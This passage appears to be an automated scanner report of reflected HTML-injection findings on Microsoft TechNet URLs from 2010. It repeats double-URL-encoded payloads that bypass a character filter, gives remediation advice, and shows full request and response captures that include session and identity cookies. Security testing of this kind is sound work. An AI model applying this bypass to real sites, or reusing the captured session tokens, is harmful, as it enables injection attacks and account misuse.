<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7b79"><a>6e48a9d51bc/library/bb727024" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d263%2522%253e%253ca%253eefc03635f13 was submitted in the REST URL parameter 2. This input was echoed as 2d263"><a>efc03635f13 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2d263%2522%253e%253ca%253eefc03635f13/bb727024.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2d263"><a>efc03635f13/bb727024" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c816%2522%253e%253ca%253ed902524dd17 was submitted in the REST URL parameter 3. This input was echoed as 1c816"><a>d902524dd17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727024.aspx1c816%2522%253e%253ca%253ed902524dd17 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727024.aspx1c816"><a>d902524dd17" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9931%2522%253e%253ca%253e1ccd3b44585 was submitted in the REST URL parameter 1. This input was echoed as f9931"><a>1ccd3b44585 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf9931%2522%253e%253ca%253e1ccd3b44585/library/bb727026.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf9931"><a>1ccd3b44585/library/bb727026" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ed7%2522%253e%253ca%253e250422238c2 was submitted in the REST URL parameter 2. This input was echoed as c9ed7"><a>250422238c2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc9ed7%2522%253e%253ca%253e250422238c2/bb727026.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:18 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc9ed7"><a>250422238c2/bb727026" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6676d%2522%253e%253ca%253ecdf872b7052 was submitted in the REST URL parameter 3. This input was echoed as 6676d"><a>cdf872b7052 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727026.aspx6676d%2522%253e%253ca%253ecdf872b7052 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:59 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727026.aspx6676d"><a>cdf872b7052" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd93f%2522%253e%253ca%253ea6bac915e69 was submitted in the REST URL parameter 1. This input was echoed as cd93f"><a>a6bac915e69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-uscd93f%2522%253e%253ca%253ea6bac915e69/library/bb727028.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-uscd93f"><a>a6bac915e69/library/bb727028" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2486a%2522%253e%253ca%253eb2bd1f24788 was submitted in the REST URL parameter 2. This input was echoed as 2486a"><a>b2bd1f24788 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2486a%2522%253e%253ca%253eb2bd1f24788/bb727028.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
